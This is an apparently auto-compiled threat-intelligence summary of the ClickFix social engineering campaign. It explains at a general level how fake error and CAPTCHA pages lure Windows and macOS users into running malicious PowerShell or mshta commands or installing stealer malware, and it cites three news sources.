Introduction
A novel social engineering tactic [2], termed ClickFix, has emerged [2], exploiting deceptive error messages to deceive users into executing harmful code [1] [2]. This tactic [2], first identified by Proofpoint in March 2024 [2], has garnered the attention of threat groups such as APT28 and primarily targets popular video conferencing platforms like Google Meet and Zoom.
Description
A new social engineering tactic known as ClickFix has emerged, exploiting deceptive error messages to trick users into executing harmful code [2]. First identified by Proofpoint in March 2024 [2], ClickFix has attracted the attention of threat groups such as APT28 and primarily targets popular video conferencing platforms like Google Meet and Zoom. This sophisticated malware delivery method utilizes tactics tailored to the unique behaviors of Windows and macOS systems, encouraging users to run malicious PowerShell commands that enable cybercriminals to infect devices with various payloads, including the Amos Stealer for macOS [3].
On macOS [1] [2], users who click on a “fix it” prompt are guided through steps that automatically download and install malware in .dmg format [2]. In contrast [2], Windows infections employ two primary chains: one utilizing a malicious mshta command and the other executing PowerShell commands. The mshta-based infections involve a VBScript embedded in an HTML application [2], while PowerShell commands can be executed directly from user input [2], including through the Windows Run dialog where users may paste malicious code copied via JavaScript. These Windows infections are designed to masquerade as legitimate troubleshooting actions [2], complicating detection efforts. Attackers leverage the trust users have in familiar interfaces and exploit legitimate Windows tools, a strategy known as “living off the land,” to bypass traditional security measures [3]. Tools like bitsadmin.exe and mshta.exe are often exploited in these attacks, emphasizing the need for robust monitoring systems to differentiate between legitimate and malicious activity [3].
ClickFix also leverages GitHub and suspicious websites [2], where users encounter redirection chains leading to fake CAPTCHA pages [2]. These deceptive pages utilize a simple PowerShell script that is difficult to detect but can have a significant impact. Effective detection of ClickFix requires monitoring specific processes and understanding these redirection chains [1]. The Sekoia TDR team is actively working to enhance detection and mitigation strategies against this evolving threat, underscoring the sophistication of social engineering tactics and the necessity for vigilance from users and organizations to mitigate associated risks [3].
Conclusion
The emergence of ClickFix highlights the evolving sophistication of social engineering tactics, posing significant risks to users and organizations. Mitigating these threats requires robust monitoring systems, enhanced detection strategies, and increased vigilance. As cybercriminals continue to exploit familiar interfaces and legitimate tools, it is imperative for both users and organizations to stay informed and proactive in their cybersecurity measures to counteract these evolving threats.
References
[1] https://thenimblenerd.com/article/beware-the-clickfix-cybercriminals-new-trick-to-infect-your-devices-with-fake-error-messages/
[2] https://www.infosecurity-magazine.com/news/clickfix-fake-errors-malicious-code/
[3] https://gbhackers.com/clickfix-exploits-gmeet-zoom-pages/
